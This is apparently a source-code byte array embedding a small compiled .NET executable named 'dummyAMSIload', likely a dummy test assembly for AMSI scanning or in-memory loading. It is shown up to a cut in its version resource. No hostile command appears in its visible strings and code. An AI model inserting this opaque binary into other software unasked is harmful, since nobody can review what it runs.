dummyAMSIload_exe[] = { 2 | 0x4d, 0x5a, 0x90, 0x00, 0x03, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 3 | 0xff, 0xff, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 4 | 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 5 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 6 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 7 | 0x80, 0x00, 0x00, 0x00, 0x0e, 0x1f, 0xba, 0x0e, 0x00, 0xb4, 0x09, 0xcd, 8 | 0x21, 0xb8, 0x01, 0x4c, 0xcd, 0x21, 0x54, 0x68, 0x69, 0x73, 0x20, 0x70, 9 | 0x72, 0x6f, 0x67, 0x72, 0x61, 0x6d, 0x20, 0x63, 0x61, 0x6e, 0x6e, 0x6f, 10 | 0x74, 0x20, 0x62, 0x65, 0x20, 0x72, 0x75, 0x6e, 0x20, 0x69, 0x6e, 0x20, 11 | 0x44, 0x4f, 0x53, 0x20, 0x6d, 0x6f, 0x64, 0x65, 0x2e, 0x0d, 0x0d, 0x0a, 12 | 0x24, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x50, 0x45, 0x00, 0x00, 13 | 0x4c, 0x01, 0x03, 0x00, 0xdb, 0x83, 0x58, 0x68, 0x00, 0x00, 0x00, 0x00, 14 | 0x00, 0x00, 0x00, 0x00, 0xe0, 0x00, 0x22, 0x00, 0x0b, 0x01, 0x30, 0x00, 15 | 0x00, 0x08, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 16 | 0x22, 0x27, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 17 | 0x00, 0x00, 0x40, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 18 | 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 19 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 20 | 0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x40, 0x85, 0x00, 0x00, 0x10, 0x00, 21 | 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x10, 0x00, 0x00, 22 | 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 23 | 0x00, 0x00, 0x00, 0x00, 0xd0, 0x26, 0x00, 0x00, 0x4f, 0x00, 0x00, 0x00, 24 | 0x00, 0x40, 0x00, 0x00, 0xac, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 25 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 26 | 0x00, 0x60, 0x00, 0x00, 0x0c, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 27 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 28 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 29 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 30 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 31 | 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 32 | 0x08, 0x20, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 33 | 0x00, 0x00, 0x00, 0x00, 0x2e, 0x74, 0x65, 0x78, 0x74, 0x00, 0x00, 0x00, 34 | 0x30, 0x07, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 35 | 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 36 | 0x00, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 0x60, 0x2e, 0x72, 0x73, 0x72, 37 | 0x63, 0x00, 0x00, 0x00, 0xac, 0x04, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 38 | 0x00, 0x06, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 39 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x40, 40 | 0x2e, 0x72, 0x65, 0x6c, 0x6f, 0x63, 0x00, 0x00, 0x0c, 0x00, 0x00, 0x00, 41 | 0x00, 0x60, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 42 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 43 | 0x40, 0x00, 0x00, 0x42, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 44 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x27, 0x00, 0x00, 45 | 0x00, 0x00, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x02, 0x00, 0x05, 0x00, 46 | 0xe8, 0x20, 0x00, 0x00, 0xe8, 0x05, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 47 | 0x04, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 48 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 49 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 50 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 51 | 0x00, 0x00, 0x00, 0x00, 0x22, 0x02, 0x28, 0x06, 0x00, 0x00, 0x0a, 0x00, 52 | 0x2a, 0x3e, 0x02, 0x28, 0x06, 0x00, 0x00, 0x0a, 0x00, 0x02, 0x03, 0x7d, 53 | 0x01, 0x00, 0x00, 0x04, 0x2a, 0x00, 0x00, 0x00, 0x13, 0x30, 0x05, 0x00, 54 | 0x5e, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x11, 0x00, 0x1f, 0x0a, 0x0a, 55 | 0x1f, 0x14, 0x0b, 0x06, 0x07, 0x58, 0x0c, 0x1a, 0x8d, 0x0a, 0x00, 0x00, 56 | 0x01, 0x25, 0xd0, 0x02, 0x00, 0x00, 0x04, 0x28, 0x07, 0x00, 0x00, 0x0a, 57 | 0x0d, 0x72, 0x01, 0x00, 0x00, 0x70, 0x13, 0x04, 0x08, 0x18, 0x5a, 0x09, 58 | 0x8e, 0x69, 0x58, 0x13, 0x05, 0x09, 0x8e, 0x69, 0x8d, 0x0a, 0x00, 0x00, 59 | 0x01, 0x13, 0x06, 0x09, 0x16, 0x11, 0x06, 0x16, 0x09, 0x8e, 0x69, 0x28, 60 | 0x08, 0x00, 0x00, 0x0a, 0x00, 0x11, 0x04, 0x16, 0x1f, 0x0a, 0x11, 0x04, 61 | 0x6f, 0x09, 0x00, 0x00, 0x0a, 0x28, 0x0a, 0x00, 0x00, 0x0a, 0x6f, 0x0b, 62 | 0x00, 0x00, 0x0a, 0x13, 0x07, 0x2a, 0x22, 0x00, 0x28, 0x03, 0x00, 0x00, 63 | 0x06, 0x00, 0x2a, 0x22, 0x02, 0x28, 0x0c, 0x00, 0x00, 0x0a, 0x00, 0x2a, 64 | 0x42, 0x53, 0x4a, 0x42, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 65 | 0x0c, 0x00, 0x00, 0x00, 0x76, 0x34, 0x2e, 0x30, 0x2e, 0x33, 0x30, 0x33, 66 | 0x31, 0x39, 0x00, 0x00, 0x00, 0x00, 0x05, 0x00, 0x6c, 0x00, 0x00, 0x00, 67 | 0x00, 0x02, 0x00, 0x00, 0x23, 0x7e, 0x00, 0x00, 0x6c, 0x02, 0x00, 0x00, 68 | 0x54, 0x02, 0x00, 0x00, 0x23, 0x53, 0x74, 0x72, 0x69, 0x6e, 0x67, 0x73, 69 | 0x00, 0x00, 0x00, 0x00, 0xc0, 0x04, 0x00, 0x00, 0x5c, 0x00, 0x00, 0x00, 70 | 0x23, 0x55, 0x53, 0x00, 0x1c, 0x05, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 71 | 0x23, 0x47, 0x55, 0x49, 0x44, 0x00, 0x00, 0x00, 0x2c, 0x05, 0x00, 0x00, 72 | 0xbc, 0x00, 0x00, 0x00, 0x23, 0x42, 0x6c, 0x6f, 0x62, 0x00, 0x00, 0x00, 73 | 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x01, 0x57, 0x14, 0x02, 0x20, 74 | 0x09, 0x00, 0x00, 0x00, 0x00, 0xfa, 0x01, 0x33, 0x00, 0x16, 0x00, 0x00, 75 | 0x01, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 76 | 0x02, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x0c, 0x00, 0x00, 0x00, 77 | 0x0a, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 78 | 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x54, 0x01, 79 | 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x06, 0x00, 0x11, 0x01, 0xcc, 0x01, 80 | 0x06, 0x00, 0x31, 0x01, 0xcc, 0x01, 0x06, 0x00, 0xe5, 0x00, 0xb9, 0x01, 81 | 0x0f, 0x00, 0xec, 0x01, 0x00, 0x00, 0x06, 0x00, 0xb2, 0x00, 0xcc, 0x01, 82 | 0x06, 0x00, 0x45, 0x01, 0x94, 0x01, 0x06, 0x00, 0x21, 0x02, 0x94, 0x01, 83 | 0x06, 0x00, 0xcd, 0x00, 0x94, 0x01, 0x06, 0x00, 0x32, 0x02, 0x94, 0x01, 84 | 0x06, 0x00, 0x4f, 0x01, 0x94, 0x01, 0x06, 0x00, 0x12, 0x02, 0xcc, 0x01, 85 | 0x06, 0x00, 0x43, 0x02, 0x94, 0x01, 0x06, 0x00, 0x8d, 0x00, 0x94, 0x01, 86 | 0x06, 0x00, 0xac, 0x01, 0x94, 0x01, 0x06, 0x00, 0x66, 0x01, 0x94, 0x01, 87 | 0x06, 0x00, 0x77, 0x01, 0x94, 0x01, 0x00, 0x00, 0x00, 0x00, 0x42, 0x00, 88 | 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x01, 0x10, 0x00, 89 | 0xa0, 0x00, 0xfb, 0x01, 0x19, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x01, 90 | 0x10, 0x00, 0xf9, 0x00, 0xcc, 0x01, 0x19, 0x00, 0x01, 0x00, 0x02, 0x00, 91 | 0x01, 0x00, 0x10, 0x00, 0x8c, 0x01, 0x87, 0x01, 0x25, 0x00, 0x02, 0x00, 92 | 0x03, 0x00, 0x00, 0x01, 0x00, 0x00, 0x4b, 0x00, 0x00, 0x00, 0x25, 0x00, 93 | 0x02, 0x00, 0x06, 0x00, 0x26, 0x00, 0xa4, 0x01, 0x4f, 0x00, 0x33, 0x01, 94 | 0x01, 0x00, 0x4f, 0x00, 0x50, 0x20, 0x00, 0x00, 0x00, 0x00, 0x86, 0x18, 95 | 0xb3, 0x01, 0x06, 0x00, 0x01, 0x00, 0x59, 0x20, 0x00, 0x00, 0x00, 0x00, 96 | 0x86, 0x18, 0xb3, 0x01, 0x01, 0x00, 0x01, 0x00, 0x6c, 0x20, 0x00, 0x00, 97 | 0x00, 0x00, 0x96, 0x00, 0x81, 0x00, 0x52, 0x00, 0x01, 0x00, 0xd6, 0x20, 98 | 0x00, 0x00, 0x00, 0x00, 0x96, 0x00, 0x9f, 0x01, 0x52, 0x00, 0x01, 0x00, 99 | 0xdf, 0x20, 0x00, 0x00, 0x00, 0x00, 0x86, 0x18, 0xb3, 0x01, 0x06, 0x00, 100 | 0x01, 0x00, 0x09, 0x00, 0xb3, 0x01, 0x01, 0x00, 0x11, 0x00, 0xb3, 0x01, 101 | 0x06, 0x00, 0x19, 0x00, 0xb3, 0x01, 0x0a, 0x00, 0x29, 0x00, 0xb3, 0x01, 102 | 0x06, 0x00, 0x41, 0x00, 0xb3, 0x01, 0x10, 0x00, 0x31, 0x00, 0xb3, 0x01, 103 | 0x06, 0x00, 0x59, 0x00, 0x39, 0x02, 0x23, 0x00, 0x71, 0x00, 0x49, 0x02, 104 | 0x2b, 0x00, 0x79, 0x00, 0x7c, 0x01, 0x36, 0x00, 0x81, 0x00, 0x9b, 0x01, 105 | 0x3a, 0x00, 0x79, 0x00, 0x6d, 0x01, 0x40, 0x00, 0x49, 0x00, 0xb3, 0x01, 106 | 0x06, 0x00, 0x27, 0x00, 0x12, 0x00, 0xb3, 0x00, 0x2e, 0x00, 0x0b, 0x00, 107 | 0x56, 0x00, 0x2e, 0x00, 0x13, 0x00, 0x5f, 0x00, 0x2e, 0x00, 0x1b, 0x00, 108 | 0x7e, 0x00, 0x43, 0x00, 0x23, 0x00, 0x87, 0x00, 0x43, 0x00, 0x0a, 0x00, 109 | 0x87, 0x00, 0x63, 0x00, 0x23, 0x00, 0x87, 0x00, 0x63, 0x00, 0x0a, 0x00, 110 | 0x87, 0x00, 0x63, 0x00, 0x2b, 0x00, 0x8c, 0x00, 0xa3, 0x00, 0x23, 0x00, 111 | 0x87, 0x00, 0x16, 0x00, 0x28, 0x27, 0x00, 0x00, 0x02, 0x00, 0x04, 0x80, 112 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 113 | 0x00, 0x00, 0x00, 0x00, 0x73, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 114 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0x00, 0x6a, 0x00, 115 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x45, 0x31, 0x32, 116 | 0x45, 0x31, 0x31, 0x35, 0x41, 0x43, 0x46, 0x34, 0x35, 0x35, 0x32, 0x42, 117 | 0x32, 0x35, 0x36, 0x38, 0x42, 0x35, 0x35, 0x45, 0x39, 0x33, 0x43, 0x42, 118 | 0x44, 0x33, 0x39, 0x33, 0x39, 0x34, 0x43, 0x34, 0x45, 0x46, 0x38, 0x31, 119 | 0x43, 0x38, 0x32, 0x34, 0x34, 0x37, 0x46, 0x41, 0x46, 0x43, 0x39, 0x39, 120 | 0x37, 0x38, 0x38, 0x32, 0x41, 0x30, 0x32, 0x44, 0x32, 0x33, 0x36, 0x37, 121 | 0x37, 0x00, 0x3c, 0x4d, 0x6f, 0x64, 0x75, 0x6c, 0x65, 0x3e, 0x00, 0x3c, 122 | 0x50, 0x72, 0x69, 0x76, 0x61, 0x74, 0x65, 0x49, 0x6d, 0x70, 0x6c, 0x65, 123 | 0x6d, 0x65, 0x6e, 0x74, 0x61, 0x74, 0x69, 0x6f, 0x6e, 0x44, 0x65, 0x74, 124 | 0x61, 0x69, 0x6c, 0x73, 0x3e, 0x00, 0x6d, 0x73, 0x63, 0x6f, 0x72, 0x6c, 125 | 0x69, 0x62, 0x00, 0x64, 0x75, 0x6d, 0x6d, 0x79, 0x41, 0x4d, 0x53, 0x49, 126 | 0x6c, 0x6f, 0x61, 0x64, 0x00, 0x44, 0x75, 0x6d, 0x6d, 0x79, 0x4d, 0x65, 127 | 0x74, 0x68, 0x6f, 0x64, 0x00, 0x52, 0x75, 0x6e, 0x74, 0x69, 0x6d, 0x65, 128 | 0x46, 0x69, 0x65, 0x6c, 0x64, 0x48, 0x61, 0x6e, 0x64, 0x6c, 0x65, 0x00, 129 | 0x45, 0x6d, 0x62, 0x65, 0x64, 0x64, 0x65, 0x64, 0x41, 0x74, 0x74, 0x72, 130 | 0x69, 0x62, 0x75, 0x74, 0x65, 0x00, 0x43, 0x6f, 0x6d, 0x70, 0x69, 0x6c, 131 | 0x65, 0x72, 0x47, 0x65, 0x6e, 0x65, 0x72, 0x61, 0x74, 0x65, 0x64, 0x41, 132 | 0x74, 0x74, 0x72, 0x69, 0x62, 0x75, 0x74, 0x65, 0x00, 0x41, 0x74, 0x74, 133 | 0x72, 0x69, 0x62, 0x75, 0x74, 0x65, 0x55, 0x73, 0x61, 0x67, 0x65, 0x41, 134 | 0x74, 0x74, 0x72, 0x69, 0x62, 0x75, 0x74, 0x65, 0x00, 0x44, 0x65, 0x62, 135 | 0x75, 0x67, 0x67, 0x61, 0x62, 0x6c, 0x65, 0x41, 0x74, 0x74, 0x72, 0x69, 136 | 0x62, 0x75, 0x74, 0x65, 0x00, 0x52, 0x65, 0x66, 0x53, 0x61, 0x66, 0x65, 137 | 0x74, 0x79, 0x52, 0x75, 0x6c, 0x65, 0x73, 0x41, 0x74, 0x74, 0x72, 0x69, 138 | 0x62, 0x75, 0x74, 0x65, 0x00, 0x43, 0x6f, 0x6d, 0x70, 0x69, 0x6c, 0x61, 139 | 0x74, 0x69, 0x6f, 0x6e, 0x52, 0x65, 0x6c, 0x61, 0x78, 0x61, 0x74, 0x69, 140 | 0x6f, 0x6e, 0x73, 0x41, 0x74, 0x74, 0x72, 0x69, 0x62, 0x75, 0x74, 0x65, 141 | 0x00, 0x52, 0x75, 0x6e, 0x74, 0x69, 0x6d, 0x65, 0x43, 0x6f, 0x6d, 0x70, 142 | 0x61, 0x74, 0x69, 0x62, 0x69, 0x6c, 0x69, 0x74, 0x79, 0x41, 0x74, 0x74, 143 | 0x72, 0x69, 0x62, 0x75, 0x74, 0x65, 0x00, 0x42, 0x79, 0x74, 0x65, 0x00, 144 | 0x64, 0x75, 0x6d, 0x6d, 0x79, 0x41, 0x4d, 0x53, 0x49, 0x6c, 0x6f, 0x61, 145 | 0x64, 0x2e, 0x65, 0x78, 0x65, 0x00, 0x53, 0x74, 0x72, 0x69, 0x6e, 0x67, 146 | 0x00, 0x53, 0x75, 0x62, 0x73, 0x74, 0x72, 0x69, 0x6e, 0x67, 0x00, 0x4d, 147 | 0x61, 0x74, 0x68, 0x00, 0x67, 0x65, 0x74, 0x5f, 0x4c, 0x65, 0x6e, 0x67, 148 | 0x74, 0x68, 0x00, 0x44, 0x75, 0x6d, 0x6d, 0x79, 0x50, 0x72, 0x6f, 0x67, 149 | 0x72, 0x61, 0x6d, 0x00, 0x53, 0x79, 0x73, 0x74, 0x65, 0x6d, 0x00, 0x4d, 150 | 0x69, 0x6e, 0x00, 0x4d, 0x61, 0x69, 0x6e, 0x00, 0x56, 0x65, 0x72, 0x73, 151 | 0x69, 0x6f, 0x6e, 0x00, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x00, 0x2e, 152 | 0x63, 0x74, 0x6f, 0x72, 0x00, 0x53, 0x79, 0x73, 0x74, 0x65, 0x6d, 0x2e, 153 | 0x44, 0x69, 0x61, 0x67, 0x6e, 0x6f, 0x73, 0x74, 0x69, 0x63, 0x73, 0x00, 154 | 0x53, 0x79, 0x73, 0x74, 0x65, 0x6d, 0x2e, 0x52, 0x75, 0x6e, 0x74, 0x69, 155 | 0x6d, 0x65, 0x2e, 0x43, 0x6f, 0x6d, 0x70, 0x69, 0x6c, 0x65, 0x72, 0x53, 156 | 0x65, 0x72, 0x76, 0x69, 0x63, 0x65, 0x73, 0x00, 0x44, 0x65, 0x62, 0x75, 157 | 0x67, 0x67, 0x69, 0x6e, 0x67, 0x4d, 0x6f, 0x64, 0x65, 0x73, 0x00, 0x4d, 158 | 0x69, 0x63, 0x72, 0x6f, 0x73, 0x6f, 0x66, 0x74, 0x2e, 0x43, 0x6f, 0x64, 159 | 0x65, 0x41, 0x6e, 0x61, 0x6c, 0x79, 0x73, 0x69, 0x73, 0x00, 0x52, 0x75, 160 | 0x6e, 0x74, 0x69, 0x6d, 0x65, 0x48, 0x65, 0x6c, 0x70, 0x65, 0x72, 0x73, 161 | 0x00, 0x41, 0x74, 0x74, 0x72, 0x69, 0x62, 0x75, 0x74, 0x65, 0x54, 0x61, 162 | 0x72, 0x67, 0x65, 0x74, 0x73, 0x00, 0x4f, 0x62, 0x6a, 0x65, 0x63, 0x74, 163 | 0x00, 0x49, 0x6e, 0x69, 0x74, 0x69, 0x61, 0x6c, 0x69, 0x7a, 0x65, 0x41, 164 | 0x72, 0x72, 0x61, 0x79, 0x00, 0x42, 0x6c, 0x6f, 0x63, 0x6b, 0x43, 0x6f, 165 | 0x70, 0x79, 0x00, 0x00, 0x00, 0x57, 0x53, 0x00, 0x79, 0x00, 0x73, 0x00, 166 | 0x74, 0x00, 0x65, 0x00, 0x6d, 0x00, 0x2e, 0x00, 0x52, 0x00, 0x75, 0x00, 167 | 0x6e, 0x00, 0x74, 0x00, 0x69, 0x00, 0x6d, 0x00, 0x65, 0x00, 0x2e, 0x00, 168 | 0x49, 0x00, 0x6e, 0x00, 0x74, 0x00, 0x65, 0x00, 0x72, 0x00, 0x6f, 0x00, 169 | 0x70, 0x00, 0x53, 0x00, 0x65, 0x00, 0x72, 0x00, 0x76, 0x00, 0x69, 0x00, 170 | 0x63, 0x00, 0x65, 0x00, 0x73, 0x00, 0x2e, 0x00, 0x57, 0x00, 0x69, 0x00, 171 | 0x6e, 0x00, 0x64, 0x00, 0x6f, 0x00, 0x77, 0x00, 0x73, 0x00, 0x45, 0x00, 172 | 0x72, 0x00, 0x72, 0x00, 0x6f, 0x00, 0x72, 0x00, 0x00, 0x00, 0x00, 0x00, 173 | 0xad, 0x28, 0xe2, 0xb0, 0x82, 0x4f, 0x8d, 0x49, 0x89, 0x37, 0x22, 0x15, 174 | 0x68, 0xf2, 0x66, 0x0b, 0x00, 0x04, 0x20, 0x01, 0x01, 0x08, 0x03, 0x20, 175 | 0x00, 0x01, 0x05, 0x20, 0x01, 0x01, 0x11, 0x11, 0x05, 0x20, 0x01, 0x01, 176 | 0x11, 0x1d, 0x0c, 0x07, 0x08, 0x08, 0x08, 0x08, 0x1d, 0x05, 0x0e, 0x08, 177 | 0x1d, 0x05, 0x0e, 0x07, 0x00, 0x02, 0x01, 0x12, 0x31, 0x11, 0x35, 0x0a, 178 | 0x00, 0x05, 0x01, 0x12, 0x31, 0x08, 0x12, 0x31, 0x08, 0x08, 0x03, 0x20, 179 | 0x00, 0x08, 0x05, 0x00, 0x02, 0x08, 0x08, 0x08, 0x05, 0x20, 0x02, 0x0e, 180 | 0x08, 0x08, 0x08, 0xb7, 0x7a, 0x5c, 0x56, 0x19, 0x34, 0xe0, 0x89, 0x02, 181 | 0x06, 0x08, 0x03, 0x00, 0x00, 0x01, 0x08, 0x01, 0x00, 0x08, 0x00, 0x00, 182 | 0x00, 0x00, 0x00, 0x1e, 0x01, 0x00, 0x01, 0x00, 0x54, 0x02, 0x16, 0x57, 183 | 0x72, 0x61, 0x70, 0x4e, 0x6f, 0x6e, 0x45, 0x78, 0x63, 0x65, 0x70, 0x74, 184 | 0x69, 0x6f, 0x6e, 0x54, 0x68, 0x72, 0x6f, 0x77, 0x73, 0x01, 0x08, 0x01, 185 | 0x00, 0x07, 0x01, 0x00, 0x00, 0x00, 0x00, 0x04, 0x01, 0x00, 0x00, 0x00, 186 | 0x26, 0x01, 0x00, 0x02, 0x00, 0x00, 0x00, 0x02, 0x00, 0x54, 0x02, 0x0d, 187 | 0x41, 0x6c, 0x6c, 0x6f, 0x77, 0x4d, 0x75, 0x6c, 0x74, 0x69, 0x70, 0x6c, 188 | 0x65, 0x00, 0x54, 0x02, 0x09, 0x49, 0x6e, 0x68, 0x65, 0x72, 0x69, 0x74, 189 | 0x65, 0x64, 0x00, 0x08, 0x01, 0x00, 0x0b, 0x00, 0x00, 0x00, 0x00, 0x00, 190 | 0xf8, 0x26, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 191 | 0x12, 0x27, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 192 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 193 | 0x00, 0x00, 0x00, 0x00, 0x04, 0x27, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 194 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x5f, 0x43, 0x6f, 0x72, 0x45, 0x78, 195 | 0x65, 0x4d, 0x61, 0x69, 0x6e, 0x00, 0x6d, 0x73, 0x63, 0x6f, 0x72, 0x65, 196 | 0x65, 0x2e, 0x64, 0x6c, 0x6c, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0x25, 197 | 0x00, 0x20, 0x40, 0x00, 0x41, 0x42, 0x43, 0x44, 0x00, 0x00, 0x00, 0x00, 198 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 199 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 200 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 201 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 202 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 203 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 204 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 205 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 206 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 207 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 208 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 209 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 210 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 211 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 212 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 213 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 214 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 215 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 216 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x10, 0x00, 0x00, 0x00, 217 | 0x20, 0x00, 0x00, 0x80, 0x18, 0x00, 0x00, 0x00, 0x50, 0x00, 0x00, 0x80, 218 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 219 | 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x38, 0x00, 0x00, 0x80, 220 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 221 | 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x00, 0x00, 0x00, 222 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 223 | 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x68, 0x00, 0x00, 0x80, 224 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 225 | 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0xac, 0x02, 0x00, 0x00, 226 | 0x90, 0x40, 0x00, 0x00, 0x1c, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 227 | 0x00, 0x00, 0x00, 0x00, 0x1c, 0x02, 0x34, 0x00, 0x00, 0x00, 0x56, 0x00, 228 | 0x53, 0x00, 0x5f, 0x00, 0x56, 0x00, 0x45, 0x00, 0x52, 0x00, 0x53, 0x00, 229 | 0x49, 0x00, 0x4f, 0x00, 0x4e, 0x00, 0x5f, 0x00, 0x49, 0x00, 0x4e, 0x00, 230 | 0x46, 0x00, 0x4f, 0x00, 0x00, 0x00, 0x00, 0x00, 0xbd, 0x04, 0xef, 0xfe, 